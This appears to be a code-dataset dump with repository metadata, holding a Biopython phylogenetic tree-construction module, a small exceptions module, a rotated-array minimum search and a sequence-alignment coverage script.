                raise IndexError("Index out of range.")
            # Only the lower triangle is stored, so order the indices.
            if row_index > col_index:
                return self.matrix[row_index][col_index]
            else:
                return self.matrix[col_index][row_index]
        else:
            raise TypeError("Invalid index type.")

    def __setitem__(self, item, value):
        """Set value by the index(s) or name(s).

        Similar to __getitem__::

            dm[1] = [1, 0, 3, 4]  set values from '1' to others;
            dm[i, j] = 2          set the value from 'i' to 'j'
        """
        # Handle single indexing
        if isinstance(item, (int, str)):
            index = None
            if isinstance(item, int):
                index = item
            elif isinstance(item, str):
                if item in self.names:
                    index = self.names.index(item)
                else:
                    raise ValueError("Item not found.")
            else:
                raise TypeError("Invalid index type.")
            # check index
            if index > len(self) - 1:
                raise IndexError("Index out of range.")
            # check and assign value: a full row is split into its lower
            # triangle components, mirroring __getitem__.
            if isinstance(value, list) and all(_is_numeric(n) for n in value):
                if len(value) == len(self):
                    for i in range(0, index):
                        self.matrix[index][i] = value[i]
                    for i in range(index, len(self)):
                        self.matrix[i][index] = value[i]
                else:
                    raise ValueError("Value not the same size.")
            else:
                raise TypeError("Invalid value type.")
        # Handle double indexing
        elif len(item) == 2:
            row_index = None
            col_index = None
            if all(isinstance(i, int) for i in item):
                row_index, col_index = item
            elif all(isinstance(i, str) for i in item):
                row_name, col_name = item
                if row_name in self.names and col_name in self.names:
                    row_index = self.names.index(row_name)
                    col_index = self.names.index(col_name)
                else:
                    raise ValueError("Item not found.")
            else:
                raise TypeError("Invalid index type.")
            # check index
            if row_index > len(self) - 1 or col_index > len(self) - 1:
                raise IndexError("Index out of range.")
            # check and assign value into the stored lower triangle
            if _is_numeric(value):
                if row_index > col_index:
                    self.matrix[row_index][col_index] = value
                else:
                    self.matrix[col_index][row_index] = value
            else:
                raise TypeError("Invalid value type.")
        else:
            raise TypeError("Invalid index type.")

    def __delitem__(self, item):
        """Delete related distances by the index or name."""
        index = None
        if isinstance(item, int):
            index = item
        elif isinstance(item, str):
            index = self.names.index(item)
        else:
            raise TypeError("Invalid index type.")
        # remove distances related to index: the column entry in every row
        # below `index`, then the row itself.
        for i in range(index + 1, len(self)):
            del self.matrix[i][index]
        del self.matrix[index]
        # remove name
        del self.names[index]

    def insert(self, name, value, index=None):
        """Insert distances given the name and value.

        :Parameters:
            name : str
                name of a row/col to be inserted
            value : list
                a row/col of values to be inserted
        """
        if isinstance(name, str):
            # insert at the given index or at the end
            if index is None:
                index = len(self)
            if not isinstance(index, int):
                raise TypeError("Invalid index type.")
            # insert name
            self.names.insert(index, name)
            # insert elements of 0, to be assigned via __setitem__ below
            self.matrix.insert(index, [0] * index)
            for i in range(index, len(self)):
                self.matrix[i].insert(index, 0)
            # assign value
            self[index] = value
        else:
            raise TypeError("Invalid name type.")

    def __len__(self):
        """Matrix length (number of names/rows)."""
        return len(self.names)

    def __repr__(self):
        """Return Matrix as a string."""
        return self.__class__.__name__ \
            + "(names=%s, matrix=%s)" \
            % tuple(map(repr, (self.names, self.matrix)))

    def __str__(self):
        """Get a lower triangular matrix string (tab-separated)."""
        matrix_string = '\n'.join(
            [self.names[i] + "\t" + "\t".join([str(n) for n in self.matrix[i]])
             for i in range(0, len(self))])
        matrix_string = matrix_string + "\n\t" + "\t".join(self.names)
        return matrix_string
class DistanceMatrix(_Matrix):
    """Distance matrix for distance-based tree algorithms.

    Behaves like :class:`_Matrix`, except that every diagonal element is
    forced to zero regardless of the values supplied by the caller.
    """

    def __init__(self, names, matrix=None):
        """Initialize the class."""
        _Matrix.__init__(self, names, matrix)
        self._set_zero_diagonal()

    def __setitem__(self, item, value):
        """Set Matrix's items to values."""
        _Matrix.__setitem__(self, item, value)
        self._set_zero_diagonal()

    def _set_zero_diagonal(self):
        """Force every diagonal element to zero (PRIVATE)."""
        for i, row in enumerate(self.matrix):
            row[i] = 0

    def format_phylip(self, handle):
        """Write data in Phylip format to a given file-like object or handle.

        The output stream is the input distance matrix format used with Phylip
        programs (e.g. 'neighbor'). See:
        http://evolution.genetics.washington.edu/phylip/doc/neighbor.html

        :Parameters:
            handle : file or file-like object
                A writeable file handle or other object supporting the 'write'
                method, such as StringIO or sys.stdout. On Python 3, should be
                open in text mode.
        """
        n_rows = len(self.matrix)
        handle.write(" {0}\n".format(len(self.names)))
        # Phylip needs space-separated, vertically aligned columns.
        name_width = max(12, max(len(name) for name in self.names) + 1)
        value_fmts = ("{" + str(col) + ":.4f}"
                      for col in range(1, n_rows + 1))
        row_fmt = "{0:" + str(name_width) + "s}" + " ".join(value_fmts) + "\n"
        for i, (name, values) in enumerate(zip(self.names, self.matrix)):
            # Mirror the lower-triangle values across the diagonal so the
            # full square matrix is written out.
            mirror_values = (self.matrix[j][i]
                             for j in range(i + 1, n_rows))
            fields = itertools.chain([name], values, mirror_values)
            handle.write(row_fmt.format(*fields))


# Shim for compatibility with Biopython<1.70 (#1304)
_DistanceMatrix = DistanceMatrix
class DistanceCalculator(object):
    """Calculate a distance matrix from a DNA or protein alignment.

    Computes pairwise distances over a Multiple Sequence Alignment (MSA)
    using the named substitution model.  Currently only scoring matrices
    are used.

    :Parameters:
        model : str
            Name of the model matrix to be used to calculate distance.
            The attribute ``dna_matrices`` contains the available model
            names for DNA sequences and ``protein_matrices`` for protein
            sequences.

    Examples
    --------
    >>> from Bio.Phylo.TreeConstruction import DistanceCalculator
    >>> from Bio import AlignIO
    >>> aln = AlignIO.read(open('Tests/TreeConstruction/msa.phy'), 'phylip')

    DNA calculator with 'identity' model::

        calculator = DistanceCalculator('identity')
        dm = calculator.get_distance(aln)

    Protein calculator with 'blosum62' model::

        calculator = DistanceCalculator('blosum62')
        dm = calculator.get_distance(aln)

    """

    dna_alphabet = ['A', 'T', 'C', 'G']

    # BLAST nucleic acid scoring matrix (lower triangular, match=5, mismatch=-4)
    blastn = [[5],
              [-4, 5],
              [-4, -4, 5],
              [-4, -4, -4, 5]]

    # transition/transversion scoring matrix
    trans = [[6],
             [-5, 6],
             [-5, -1, 6],
             [-1, -5, -5, 6]]

    protein_alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',
                        'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y',
                        'Z']

    # matrices available
    dna_matrices = {'blastn': blastn, 'trans': trans}
    protein_models = MatrixInfo.available_matrices
    protein_matrices = {name: getattr(MatrixInfo, name)
                        for name in protein_models}

    dna_models = list(dna_matrices.keys())
    models = ['identity'] + dna_models + protein_models

    def __init__(self, model='identity', skip_letters=None):
        """Initialize with a distance model."""
        # Shim for backward compatibility (#491): default skip letters
        # depend on the model unless explicitly provided.
        if skip_letters:
            self.skip_letters = skip_letters
        elif model == 'identity':
            self.skip_letters = ()
        else:
            self.skip_letters = ('-', '*')
        if model == 'identity':
            self.scoring_matrix = None
        elif model in self.dna_models:
            self.scoring_matrix = _Matrix(self.dna_alphabet,
                                          self.dna_matrices[model])
        elif model in self.protein_models:
            self.scoring_matrix = self._build_protein_matrix(
                self.protein_matrices[model])
        else:
            raise ValueError("Model not supported. Available models: " +
                             ", ".join(self.models))

    def _pairwise(self, seq1, seq2):
        """Calculate pairwise distance from two sequences (PRIVATE).

        Returns a value between 0 (identical sequences) and 1 (completely
        different, or seq1 is an empty string.)
        """
        score = 0
        max_score = 0
        if self.scoring_matrix:
            max_score1 = 0
            max_score2 = 0
            for i in range(0, len(seq1)):
                l1 = seq1[i]
                l2 = seq2[i]
                if l1 in self.skip_letters or l2 in self.skip_letters:
                    continue
                if l1 not in self.scoring_matrix.names:
                    raise ValueError("Bad alphabet '%s' in sequence '%s' at position '%s'"
                                     % (l1, seq1.id, i))
                if l2 not in self.scoring_matrix.names:
                    raise ValueError("Bad alphabet '%s' in sequence '%s' at position '%s'"
                                     % (l2, seq2.id, i))
                max_score1 += self.scoring_matrix[l1, l1]
                max_score2 += self.scoring_matrix[l2, l2]
                score += self.scoring_matrix[l1, l2]
            # Take the higher score if the matrix is asymmetrical
            max_score = max(max_score1, max_score2)
        else:
            # Score by character identity, not skipping any special letters
            score = sum(l1 == l2
                        for l1, l2 in zip(seq1, seq2)
                        if l1 not in self.skip_letters and l2 not in self.skip_letters)
            max_score = len(seq1)
        if max_score == 0:
            return 1  # max possible scaled distance
        return 1 - (score * 1.0 / max_score)

    def get_distance(self, msa):
        """Return a DistanceMatrix for MSA object.

        :Parameters:
            msa : MultipleSeqAlignment
                DNA or Protein multiple sequence alignment.
        """
        if not isinstance(msa, MultipleSeqAlignment):
            raise TypeError("Must provide a MultipleSeqAlignment object.")
        names = [s.id for s in msa]
        dm = DistanceMatrix(names)
        # fill the upper-half assignments; DistanceMatrix stores symmetrically
        for seq1, seq2 in itertools.combinations(msa, 2):
            dm[seq1.id, seq2.id] = self._pairwise(seq1, seq2)
        return dm

    def _build_protein_matrix(self, subsmat):
        """Convert matrix from SubsMat format to _Matrix object (PRIVATE)."""
        protein_matrix = _Matrix(self.protein_alphabet)
        for k, v in subsmat.items():
            aa1, aa2 = k
            protein_matrix[aa1, aa2] = v
        return protein_matrix
class TreeConstructor(object):
    """Abstract base class for tree constructors."""

    def build_tree(self, msa):
        """Construct a tree from a MultipleSeqAlignment object.

        Concrete subclasses must override this method.
        """
        raise NotImplementedError("Method not implemented!")
class DistanceTreeConstructor(TreeConstructor):
    """Distance based tree constructor.

    :Parameters:
        method : str
            Distance tree construction method, 'nj'(default) or 'upgma'.
        distance_calculator : DistanceCalculator
            The distance matrix calculator for multiple sequence alignment.
            It must be provided if ``build_tree`` will be called.

    Examples
    --------
    >>> from TreeConstruction import DistanceTreeConstructor
    >>> constructor = DistanceTreeConstructor()

    UPGMA Tree::

        calculator = DistanceCalculator('identity')
        dm = calculator.get_distance(aln)
        upgmatree = constructor.upgma(dm)

    NJ Tree::

        njtree = constructor.nj(dm)

    """

    methods = ['nj', 'upgma']

    def __init__(self, distance_calculator=None, method="nj"):
        """Initialize the class."""
        if (distance_calculator is None or
                isinstance(distance_calculator, DistanceCalculator)):
            self.distance_calculator = distance_calculator
        else:
            raise TypeError("Must provide a DistanceCalculator object.")
        if isinstance(method, str) and method in self.methods:
            self.method = method
        else:
            raise TypeError("Bad method: " + method +
                            ". Available methods: " + ", ".join(self.methods))

    def build_tree(self, msa):
        """Construct and return a Tree, Neighbor Joining or UPGMA."""
        if self.distance_calculator:
            dm = self.distance_calculator.get_distance(msa)
            tree = None
            if self.method == 'upgma':
                tree = self.upgma(dm)
            else:
                tree = self.nj(dm)
            return tree
        else:
            raise TypeError("Must provide a DistanceCalculator object.")

    def upgma(self, distance_matrix):
        """Construct and return an UPGMA tree.

        Constructs and returns an Unweighted Pair Group Method
        with Arithmetic mean (UPGMA) tree.

        :Parameters:
            distance_matrix : DistanceMatrix
                The distance matrix for tree construction.
        """
        if not isinstance(distance_matrix, DistanceMatrix):
            raise TypeError("Must provide a DistanceMatrix object.")
        # make a copy of the distance matrix to be used
        dm = copy.deepcopy(distance_matrix)
        # init terminal clades
        clades = [BaseTree.Clade(None, name) for name in dm.names]
        # init minimum index
        min_i = 0
        min_j = 0
        inner_count = 0
        # Repeatedly merge the closest pair until one clade remains.
        while len(dm) > 1:
            min_dist = dm[1, 0]
            # find minimum index
            for i in range(1, len(dm)):
                for j in range(0, i):
                    if min_dist >= dm[i, j]:
                        min_dist = dm[i, j]
                        min_i = i
                        min_j = j
            # create clade
            clade1 = clades[min_i]
            clade2 = clades[min_j]
            inner_count += 1
            inner_clade = BaseTree.Clade(None, "Inner" + str(inner_count))
            inner_clade.clades.append(clade1)
            inner_clade.clades.append(clade2)
            # assign branch length: half the merge distance, minus the
            # height already accumulated below a non-terminal child
            if clade1.is_terminal():
                clade1.branch_length = min_dist * 1.0 / 2
            else:
                clade1.branch_length = min_dist * \
                    1.0 / 2 - self._height_of(clade1)
            if clade2.is_terminal():
                clade2.branch_length = min_dist * 1.0 / 2
            else:
                clade2.branch_length = min_dist * \
                    1.0 / 2 - self._height_of(clade2)
            # update node list
            clades[min_j] = inner_clade
            del clades[min_i]
            # rebuild distance matrix,
            # set the distances of new node at the index of min_j
            for k in range(0, len(dm)):
                if k != min_i and k != min_j:
                    dm[min_j, k] = (dm[min_i, k] + dm[min_j, k]) * 1.0 / 2
            dm.names[min_j] = "Inner" + str(inner_count)
            del dm[min_i]
        inner_clade.branch_length = 0
        return BaseTree.Tree(inner_clade)

    def nj(self, distance_matrix):
        """Construct and return a Neighbor Joining tree.

        :Parameters:
            distance_matrix : DistanceMatrix
                The distance matrix for tree construction.
        """
        if not isinstance(distance_matrix, DistanceMatrix):
            raise TypeError("Must provide a DistanceMatrix object.")
        # make a copy of the distance matrix to be used
        dm = copy.deepcopy(distance_matrix)
        # init terminal clades
        clades = [BaseTree.Clade(None, name) for name in dm.names]
        # init node distance
        node_dist = [0] * len(dm)
        # init minimum index
        min_i = 0
        min_j = 0
        inner_count = 0
        # special cases for Minimum Alignment Matrices
        if len(dm) == 1:
            root = clades[0]
            return BaseTree.Tree(root, rooted=False)
        elif len(dm) == 2:
            # minimum distance will always be [1,0]
            min_i = 1
            min_j = 0
            clade1 = clades[min_i]
            clade2 = clades[min_j]
            clade1.branch_length = dm[min_i, min_j] / 2.0
            clade2.branch_length = dm[min_i, min_j] - clade1.branch_length
            inner_clade = BaseTree.Clade(None, "Inner")
            inner_clade.clades.append(clade1)
            inner_clade.clades.append(clade2)
            clades[0] = inner_clade
            root = clades[0]
            return BaseTree.Tree(root, rooted=False)
        while len(dm) > 2:
            # calculate nodeDist (average distance to all other nodes)
            for i in range(0, len(dm)):
                node_dist[i] = 0
                for j in range(0, len(dm)):
                    node_dist[i] += dm[i, j]
                node_dist[i] = node_dist[i] / (len(dm) - 2)
            # find minimum distance pair by the NJ Q-criterion
            min_dist = dm[1, 0] - node_dist[1] - node_dist[0]
            min_i = 0
            min_j = 1
            for i in range(1, len(dm)):
                for j in range(0, i):
                    temp = dm[i, j] - node_dist[i] - node_dist[j]
                    if min_dist > temp:
                        min_dist = temp
                        min_i = i
                        min_j = j
            # create clade
            clade1 = clades[min_i]
            clade2 = clades[min_j]
            inner_count += 1
            inner_clade = BaseTree.Clade(None, "Inner" + str(inner_count))
            inner_clade.clades.append(clade1)
            inner_clade.clades.append(clade2)
            # assign branch length
            clade1.branch_length = (dm[min_i, min_j] + node_dist[min_i] -
                                    node_dist[min_j]) / 2.0
            clade2.branch_length = dm[min_i, min_j] - clade1.branch_length
            # update node list
            clades[min_j] = inner_clade
            del clades[min_i]
            # rebuild distance matrix,
            # set the distances of new node at the index of min_j
            for k in range(0, len(dm)):
                if k != min_i and k != min_j:
                    dm[min_j, k] = (dm[min_i, k] + dm[min_j, k] -
                                    dm[min_i, min_j]) / 2.0
            dm.names[min_j] = "Inner" + str(inner_count)
            del dm[min_i]
        # set the last clade as one of the child of the inner_clade
        root = None
        if clades[0] == inner_clade:
            clades[0].branch_length = 0
            clades[1].branch_length = dm[1, 0]
            clades[0].clades.append(clades[1])
            root = clades[0]
        else:
            clades[0].branch_length = dm[1, 0]
            clades[1].branch_length = 0
            clades[1].clades.append(clades[0])
            root = clades[1]
        return BaseTree.Tree(root, rooted=False)

    def _height_of(self, clade):
        """Calculate clade height -- the longest path to any terminal (PRIVATE)."""
        height = 0
        if clade.is_terminal():
            height = clade.branch_length
        else:
            height = height + max(self._height_of(c) for c in clade.clades)
        return height
# #################### Tree Scoring and Searching Classes #####################
class Scorer(object):
    """Abstract base class for tree scoring strategies."""

    def get_score(self, tree, alignment):
        """Return the score of *tree* for the given *alignment*.

        Concrete subclasses must override this method.
        """
        raise NotImplementedError("Method not implemented!")
class TreeSearcher(object):
    """Abstract base class for tree searching strategies."""

    def search(self, starting_tree, alignment):
        """Search for the best tree beginning from *starting_tree*.

        Concrete subclasses must override this method.
        """
        raise NotImplementedError("Method not implemented!")
class NNITreeSearcher(TreeSearcher):
    """Tree searching with Nearest Neighbor Interchanges (NNI) algorithm.

    :Parameters:
        scorer : ParsimonyScorer
            parsimony scorer to calculate the parsimony score of
            different trees during NNI algorithm.
    """

    def __init__(self, scorer):
        """Initialize the class."""
        if isinstance(scorer, Scorer):
            self.scorer = scorer
        else:
            raise TypeError("Must provide a Scorer object.")

    def search(self, starting_tree, alignment):
        """Implement the TreeSearcher.search method.

        :Parameters:
            starting_tree : Tree
                starting tree of NNI method.
            alignment : MultipleSeqAlignment
                multiple sequence alignment used to calculate parsimony
                score of different NNI trees.
        """
        return self._nni(starting_tree, alignment)

    def _nni(self, starting_tree, alignment):
        """Search for the best parsimony tree using the NNI algorithm (PRIVATE)."""
        best_tree = starting_tree
        # Hill-climb: keep taking the best-scoring neighbor until no
        # neighbor improves on the current tree.
        while True:
            best_score = self.scorer.get_score(best_tree, alignment)
            temp = best_score
            for t in self._get_neighbors(best_tree):
                score = self.scorer.get_score(t, alignment)
                if score < best_score:
                    best_score = score
                    best_tree = t
            # stop if no smaller score exist
            if best_score >= temp:
                break
        return best_tree

    def _get_neighbors(self, tree):
        """Get all neighbor trees of the given tree (PRIVATE).

        Currently only for binary rooted trees.  Each neighbor is produced
        by one nearest-neighbor interchange: swapping a subtree with its
        "uncle" around an internal edge.  The tree is mutated in place,
        deep-copied to record the neighbor, then mutated back.
        """
        # make child to parent dict
        parents = {}
        for clade in tree.find_clades():
            if clade != tree.root:
                node_path = tree.get_path(clade)
                # cannot get the parent if the parent is root. Bug?
                if len(node_path) == 1:
                    parents[clade] = tree.root
                else:
                    parents[clade] = node_path[-2]
        neighbors = []
        root_childs = []
        for clade in tree.get_nonterminals(order="level"):
            if clade == tree.root:
                left = clade.clades[0]
                right = clade.clades[1]
                root_childs.append(left)
                root_childs.append(right)
                if not left.is_terminal() and not right.is_terminal():
                    # make changes around the left_left clade
                    # left_left = left.clades[0]
                    left_right = left.clades[1]
                    right_left = right.clades[0]
                    right_right = right.clades[1]
                    # neighbor 1 (left_left + right_right)
                    del left.clades[1]
                    del right.clades[1]
                    left.clades.append(right_right)
                    right.clades.append(left_right)
                    temp_tree = copy.deepcopy(tree)
                    neighbors.append(temp_tree)
                    # neighbor 2 (left_left + right_left)
                    del left.clades[1]
                    del right.clades[0]
                    left.clades.append(right_left)
                    right.clades.append(right_right)
                    temp_tree = copy.deepcopy(tree)
                    neighbors.append(temp_tree)
                    # change back (left_left + left_right)
                    del left.clades[1]
                    del right.clades[0]
                    left.clades.append(left_right)
                    right.clades.insert(0, right_left)
            elif clade in root_childs:
                # skip root child
                continue
            else:
                # method for other clades
                # make changes around the parent clade
                left = clade.clades[0]
                right = clade.clades[1]
                parent = parents[clade]
                if clade == parent.clades[0]:
                    sister = parent.clades[1]
                    # neighbor 1 (parent + right)
                    del parent.clades[1]
                    del clade.clades[1]
                    parent.clades.append(right)
                    clade.clades.append(sister)
                    temp_tree = copy.deepcopy(tree)
                    neighbors.append(temp_tree)
                    # neighbor 2 (parent + left)
                    del parent.clades[1]
                    del clade.clades[0]
                    parent.clades.append(left)
                    clade.clades.append(right)
                    temp_tree = copy.deepcopy(tree)
                    neighbors.append(temp_tree)
                    # change back (parent + sister)
                    del parent.clades[1]
                    del clade.clades[0]
                    parent.clades.append(sister)
                    clade.clades.insert(0, left)
                else:
                    sister = parent.clades[0]
                    # neighbor 1 (parent + right)
                    del parent.clades[0]
                    del clade.clades[1]
                    parent.clades.insert(0, right)
                    clade.clades.append(sister)
                    temp_tree = copy.deepcopy(tree)
                    neighbors.append(temp_tree)
                    # neighbor 2 (parent + left)
                    del parent.clades[0]
                    del clade.clades[0]
                    parent.clades.insert(0, left)
                    clade.clades.append(right)
                    temp_tree = copy.deepcopy(tree)
                    neighbors.append(temp_tree)
                    # change back (parent + sister)
                    del parent.clades[0]
                    del clade.clades[0]
                    parent.clades.insert(0, sister)
                    clade.clades.insert(0, left)
        return neighbors
# ######################## Parsimony Classes ##########################
class ParsimonyScorer(Scorer):
    """Parsimony scorer with a scoring matrix.
    This is a combination of Fitch algorithm and Sankoff algorithm.
    See ParsimonyTreeConstructor for usage.
    :Parameters:
        matrix : _Matrix
            scoring matrix used in parsimony score calculation.
    """
    def __init__(self, matrix=None):
        """Initialize the class."""
        # A falsy matrix (None) selects the unweighted Fitch algorithm in
        # get_score(); a _Matrix instance selects the weighted Sankoff
        # algorithm.  Anything else is rejected.
        if not matrix or isinstance(matrix, _Matrix):
            self.matrix = matrix
        else:
            raise TypeError("Must provide a _Matrix object.")
    def get_score(self, tree, alignment):
        """Calculate parsimony score using the Fitch algorithm.
        Calculate and return the parsimony score given a tree and the
        MSA using either the Fitch algorithm (without a penalty matrix)
        or the Sankoff algorithm (with a matrix).
        """
        # make sure the tree is rooted and bifurcating
        if not tree.is_bifurcating():
            raise ValueError("The tree provided should be bifurcating.")
        if not tree.rooted:
            # NOTE(review): this roots the caller's tree in place (side effect).
            tree.root_at_midpoint()
        # sort tree terminals and alignment so terminals and records pair up
        terms = tree.get_terminals()
        terms.sort(key=lambda term: term.name)
        alignment.sort()
        if not all(t.name == a.id for t, a in zip(terms, alignment)):
            raise ValueError(
                "Taxon names of the input tree should be the same with the alignment.")
        # term_align = dict(zip(terms, alignment))
        score = 0
        for i in range(len(alignment[0])):
            # parsimony score for column_i
            score_i = 0
            # get column (one character per taxon, as a string)
            column_i = alignment[:, i]
            # skip non-informative column: all characters identical
            # (string-repetition trick: "AAA" == 3 * "A")
            if column_i == len(column_i) * column_i[0]:
                continue
            # start calculating score_i using the tree and column_i
            # Fitch algorithm without the penalty matrix
            if not self.matrix:
                # init by mapping terminal clades and states in column_i
                clade_states = dict(zip(terms, [{c} for c in column_i]))
                for clade in tree.get_nonterminals(order="postorder"):
                    clade_childs = clade.clades
                    left_state = clade_states[clade_childs[0]]
                    right_state = clade_states[clade_childs[1]]
                    # keep the intersection when the children agree;
                    # otherwise take the union and count one substitution
                    state = left_state & right_state
                    if not state:
                        state = left_state | right_state
                        score_i = score_i + 1
                    clade_states[clade] = state
            # Sankoff algorithm with the penalty matrix
            else:
                inf = float('inf')
                # init score arrays for terminal clades:
                # cost 0 for the observed character, inf elsewhere
                alphabet = self.matrix.names
                length = len(alphabet)
                clade_scores = {}
                for j in range(len(column_i)):
                    array = [inf] * length
                    index = alphabet.index(column_i[j])
                    array[index] = 0
                    clade_scores[terms[j]] = array
                # bottom up calculation (classic Sankoff recursion:
                # cheapest child assignment given each parent state m)
                for clade in tree.get_nonterminals(order="postorder"):
                    clade_childs = clade.clades
                    left_score = clade_scores[clade_childs[0]]
                    right_score = clade_scores[clade_childs[1]]
                    array = []
                    for m in range(length):
                        min_l = inf
                        min_r = inf
                        for n in range(length):
                            sl = self.matrix[
                                alphabet[m], alphabet[n]] + left_score[n]
                            sr = self.matrix[
                                alphabet[m], alphabet[n]] + right_score[n]
                            if min_l > sl:
                                min_l = sl
                            if min_r > sr:
                                min_r = sr
                        array.append(min_l + min_r)
                    clade_scores[clade] = array
                # minimum from root score
                # (postorder visits the root last, so `array` is the root's)
                score_i = min(array)
            # TODO: resolve internal states
            score = score + score_i
        return score
class ParsimonyTreeConstructor(TreeConstructor):
    """Parsimony tree constructor.
    :Parameters:
        searcher : TreeSearcher
            tree searcher to search the best parsimony tree.
        starting_tree : Tree
            starting tree provided to the searcher.
    Examples
    --------
    >>> from Bio import AlignIO, Phylo
    >>> aln = AlignIO.read(open('Tests/TreeConstruction/msa.phy'), 'phylip')
    >>> print(aln)
    SingleLetterAlphabet() alignment with 5 rows and 13 columns
    AACGTGGCCACAT Alpha
    AAGGTCGCCACAC Beta
    GAGATTTCCGCCT Delta
    GAGATCTCCGCCC Epsilon
    CAGTTCGCCACAA Gamma
    >>> starting_tree = Phylo.read('Tests/TreeConstruction/nj.tre', 'newick')
    >>> print(starting_tree)
    Tree(weight=1.0, rooted=False)
        Clade(branch_length=0.0, name='Inner3')
            Clade(branch_length=0.01421, name='Inner2')
                Clade(branch_length=0.23927, name='Inner1')
                    Clade(branch_length=0.08531, name='Epsilon')
                    Clade(branch_length=0.13691, name='Delta')
                Clade(branch_length=0.29231, name='Alpha')
            Clade(branch_length=0.07477, name='Beta')
            Clade(branch_length=0.17523, name='Gamma')
    >>> scorer = ParsimonyScorer()
    >>> searcher = NNITreeSearcher(scorer)
    >>> constructor = ParsimonyTreeConstructor(searcher, starting_tree)
    >>> pars_tree = constructor.build_tree(aln)
    >>> print(pars_tree)
    Tree(weight=1.0, rooted=True)
        Clade(branch_length=0.0)
            Clade(branch_length=0.197335, name='Inner1')
                Clade(branch_length=0.13691, name='Delta')
                Clade(branch_length=0.08531, name='Epsilon')
            Clade(branch_length=0.041935, name='Inner2')
                Clade(branch_length=0.01421, name='Inner3')
                    Clade(branch_length=0.17523, name='Gamma')
                    Clade(branch_length=0.07477, name='Beta')
                Clade(branch_length=0.29231, name='Alpha')
    """
    def __init__(self, searcher, starting_tree=None):
        """Initialize the class."""
        self.searcher = searcher
        self.starting_tree = starting_tree
    def build_tree(self, alignment):
        """Build the tree.
        :Parameters:
            alignment : MultipleSeqAlignment
                multiple sequence alignment to calculate parsimony tree.
        """
        # if starting_tree is none,
        # create a upgma tree with 'identity' scoring matrix
        if self.starting_tree is None:
            dtc = DistanceTreeConstructor(DistanceCalculator("identity"),
                                          "upgma")
            self.starting_tree = dtc.build_tree(alignment)
        # NOTE(review): the UPGMA fallback is cached on self, so a second
        # call with a different alignment reuses the first starting tree.
        return self.searcher.search(self.starting_tree, alignment)
| [
"adrilabbelol@gmail.com"
] | adrilabbelol@gmail.com |
9cb938048f68b47602170f1e3f23275c9c1e5941 | 9594585cc05dded72740774a3d6058971386dd9a | /boss/core/exc.py | 80e4e91c50c60fee37aa3030542ce45190324e3a | [
"BSD-3-Clause"
] | permissive | derks/boss | 3a22044d9542ba249f95fd7081e86f3451c16134 | 8b81ddfb9b44dab018329a304a5e5a75fa20b060 | refs/heads/master | 2021-01-18T05:37:47.894064 | 2013-06-27T21:01:20 | 2013-06-27T21:01:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | """Boss core exceptions module."""
class BossError(Exception):
    """Generic base class for all Boss errors.

    Stores the message on ``self.msg`` and also forwards it to
    ``Exception`` so that ``e.args`` is populated.
    """
    def __init__(self, msg):
        # Bug fix: the old code called Exception.__init__(self) with no
        # arguments, so e.args was empty and the message was lost when
        # the exception was pickled or rendered by generic handlers.
        Exception.__init__(self, msg)
        self.msg = msg
    def __str__(self):
        return self.msg
class BossConfigError(BossError):
    """Raised for configuration-related errors."""
    pass
class BossRuntimeError(BossError):
    """Raised for errors occurring while Boss is running."""
    pass
class BossArgumentError(BossError):
    """Raised for invalid arguments."""
    pass
class BossTemplateError(BossError):
    """Raised for template processing errors."""
    pass
"wdierkes@rackspace.com"
] | wdierkes@rackspace.com |
0432520283360ee1b0dd7d23b368b1d7c7dead0e | 75320fdf80925dc39f61e14eeca67b1c3d275077 | /min-element-sorted-rotated-array.py | 38ecc510a7b8a267ae6cc38b272011b76a1c1d34 | [] | no_license | HarishK501/100-days-of-coding | 453e260f4bd6bab5578d6db5b9c511d0637bc8ad | 4622e42ce813eb835b48d63396e0dd4772ff9415 | refs/heads/master | 2023-02-15T14:14:05.115654 | 2020-12-28T16:10:26 | 2020-12-28T16:10:26 | 297,650,308 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | def getMin(A):
low = 0
high = len(A) - 1
while low <= high:
mid = (low+high) // 2
if mid - 1 >= 0:
if A[mid-1] > A[mid]:
return "Minimum element = {}".format(A[mid])
elif A[mid] < A[high]:
high = mid
else:
low = mid + 1
else:
return "Minimum element = {}".format(A[0])
def main():
    """Interactive driver: read whitespace-separated integers per line and
    print the minimum of the (sorted, rotated) array until '#' is typed."""
    print("Type # to exit.")
    while True:
        raw = input("\nEnter array elements: ")
        if raw == "#":
            break
        values = [int(token) for token in raw.split()]
        print(getMin(values))
    return "\nThank You\n"
if __name__ == '__main__':
    print(main())
| [
"noreply@github.com"
] | HarishK501.noreply@github.com |
e3ad03ee9c92c6781cc717be48460412daa140bb | ee4feddb2dd410602377e749b56c4d1563ab58ef | /20140409_alignprofile/alignprofile.py | 9577a1758780d9c8d62a961ac0a90e30a2bd635c | [] | no_license | moritzbuck/Pyscratches | 505431b7d141e72d6bb89d52eabd0c37aba6e536 | f0e752abc18017db9dad9f8dde920174bf94d463 | refs/heads/master | 2020-04-06T07:00:13.540303 | 2018-02-12T15:01:07 | 2018-02-12T15:01:07 | 58,471,067 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,209 | py | from Bio import SeqIO
from numpy import median
from numpy import mean
from tqdm import tqdm
import os.path
from pandas import Series
file ="test.fasta"
file ="/home/moritz/dropbox/stability.trim.contigs.good.unique.align"
if not os.path.isfile("coverages.csv") :
print "compute coverages"
if 'coverage' in locals() : del coverage
handle = open(file, "rU")
for record in tqdm(SeqIO.parse(handle, "fasta")) :
seq = str(record.seq)
l = len(seq)
if 'coverage' not in locals():
coverage = [0]*l
for (i,c) in enumerate(seq):
if c not in ['.','-']:
coverage[i] = coverage[i] +1
coverage=Series(coverage)
coverage.to_csv("coverages.csv",index=False)
handle.close()
else :
print "import coverages"
coverage = Series.from_csv("coverages.csv",header=-1, index_col=False)
print "compute median-ish things"
medians = []
means = []
maxs = []
mins = []
lens = []
left = []
right = []
unsure = []
handle = open(file, "rU")
positions=list(coverage[coverage > 500000].index)
l = len(positions)
for record in tqdm(SeqIO.parse(handle, "fasta")) :
seq = str(record.seq)
poss =[]
for (i,c) in enumerate(positions):
if seq[c] not in ['.','-']:
poss.append(i)
if len(poss) >0 :
medians.append(median(poss))
means.append(mean(poss))
mins.append(min(poss))
maxs.append(max(poss))
lens.append(len(poss))
if mean(poss) < 300:
left.append(record)
else :
right.append(record)
else:
unsure.append(record)
handle.close()
